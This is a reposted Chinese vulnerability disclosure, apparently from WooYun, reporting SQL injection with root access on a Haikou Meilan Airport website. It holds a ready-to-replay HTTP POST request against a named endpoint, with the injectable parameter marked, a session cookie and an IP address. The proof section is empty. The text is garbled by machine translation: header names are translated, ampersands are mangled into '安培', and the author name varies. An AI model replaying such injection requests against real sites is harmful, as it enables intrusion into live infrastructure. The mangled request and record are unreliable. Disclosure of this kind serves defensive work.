海南航空某站点SQL注入/root权限
漏洞标题 海南航空某站点SQL注入/root权限 相关厂商 海南海口美兰机场 漏洞作者 路人甲 提交时间 2016-05-06 09:09 公开时间 2016-06-20 10:00 漏洞类型 SQL…
漏洞标题
海南航空有一个网站SQL注入/root权限
相关制造商
海南海口美兰机场
漏洞作者
过路人
提交时间
2016-05-06 09: 09
公共时间
2016-06-20 10: 00
漏洞类型
SQL注入漏洞
危险等级
高
自我评估等级
15
漏洞状态
制造商已确认
标签标签
Mysql注入
漏洞详细信息
Www.mlairport.com
POST /autoweb/wjdc/wjdcManager.do HTTP/1.1
主机: www.mlairport.com
用户代理: Mozilla/5.0(Macintosh; Intel Mac OS X 10.10; rv: 45.0)Gecko/20100101 Firefox/45.0
接受: text/html,application/xhtml + xml,application/xml; q=0.9,*/*; q=0.8
Accept-Language: zh-CN,zh; q=0.8,en-US; q=0.5,en; Q=0.3
Accept-Encoding: gzip,deflate
Cookie: JSESSIONID=DAAC0D318E4F44595A4C3D6DE2F103EC
连接:保持活动状态
内容类型: application/x-www-form-urlencoded
内容长度: 483
COL1=1 *&安培; col10=%B7%C7%B3%A3%C2%FA%D2%E2&安培; col11=%B7%C7%B3%A3%C2%FA%D2%E2&安培; COL12=%B7%C7 %B3%A3%C2%FA%D2%E2&安培; col13=%B7%C7%B3%A3%C2%FA%D2%E2&安培; col14=%B7%C7%B3%A3%C2%FA%D2%E2&安培; col15=%B7%C7%B3%A3%C2%FA%D2%E2&安培; col16=%B7%C7%B3%A3%C2%FA%D2%E2&安培; col17=%B7%C7%B3%A3% C2%FA%D2%E2&安培; COL2=1&安培; COL3=1&安培; COL4=1&安培; COL5=%CA%C7&安培; COL6=%BB%FA%B3%A1%B0%CD%CA%BF&安培; COL7=%CA %C7&安培; col8=%B7%C7%B3%A3%C2%FA%D2%E2&安培; col9=%B7%C7%B3%A3%C2%FA%D2%E2&安培; IPADDRESS=124.114.77.180&安培;方法=saveWjAction& state=& times=2016-03-15%2003: 54: 26& webname=syfh
漏洞证明:
修理计划:
过滤参数
版权声明:请注明出处。居民A @乌云
修理计划:
过滤参数
版权声明:请注明出处。居民A @乌云
- 发表于 2016-07-17 08:00
- 阅读 ( 514 )
- 分类:黑客技术
